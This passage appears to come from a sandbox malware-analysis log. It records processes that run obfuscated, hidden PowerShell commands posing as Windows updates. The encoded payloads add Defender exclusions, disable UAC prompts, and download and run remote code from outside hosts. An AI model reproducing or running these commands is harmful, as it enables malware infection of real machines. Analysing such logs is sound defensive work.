YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'dqogicagicagicrxzefsaya9iefezc10evblic1nzw1czvjkruzjbklusu9uicdbrgxssw1wb3j0kcj1ukxnb04ilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihpxlcbzdhjpbmcgshl0bflar3dprlqsihn0cmluzyb0c3rmevusihvpbnqgb2xhbejotmzmu0ssieludfb0cibuauxpktsnic1uqw1licjwdwxoy0d2aufqiiattkfnrxnwyunlifbhc1fjd3bewsatugfzc1rocnu7ia0kicagicagicakv2rbums6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly80ns4ymdaumtq5ljewndo1mdawl2rvd25sb2fkl25vdmffa2f5y2vllnzicyisiirltly6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyismcwwktsgdqogicagicagihnuqxjulxnmzuvwkdmpoyanciagicagicagaw5wb0tllwvychjfc1npt24giirftny6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyinciagicagicag'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'dqogicagicagicrxzefsaya9iefezc10evblic1nzw1czvjkruzjbklusu9uicdbrgxssw1wb3j0kcj1ukxnb04ilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihpxlcbzdhjpbmcgshl0bflar3dprlqsihn0cmluzyb0c3rmevusihvpbnqgb2xhbejotmzmu0ssieludfb0cibuauxpktsnic1uqw1licjwdwxoy0d2aufqiiattkfnrxnwyunlifbhc1fjd3bewsatugfzc1rocnu7ia0kicagicagicakv2rbums6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly80ns4ymdaumtq5ljewndo1mdawl2rvd25sb2fkl25vdmffa2f5y2vllnzicyisiirltly6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyismcwwktsgdqogicagicagihnuqxjulxnmzuvwkdmpoyanciagicagicagaw5wb0tllwvychjfc1npt24giirftny6qvbqrefuqvx3aw5kb3dzdxbkyxrllnziuyinciagicagicag'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhl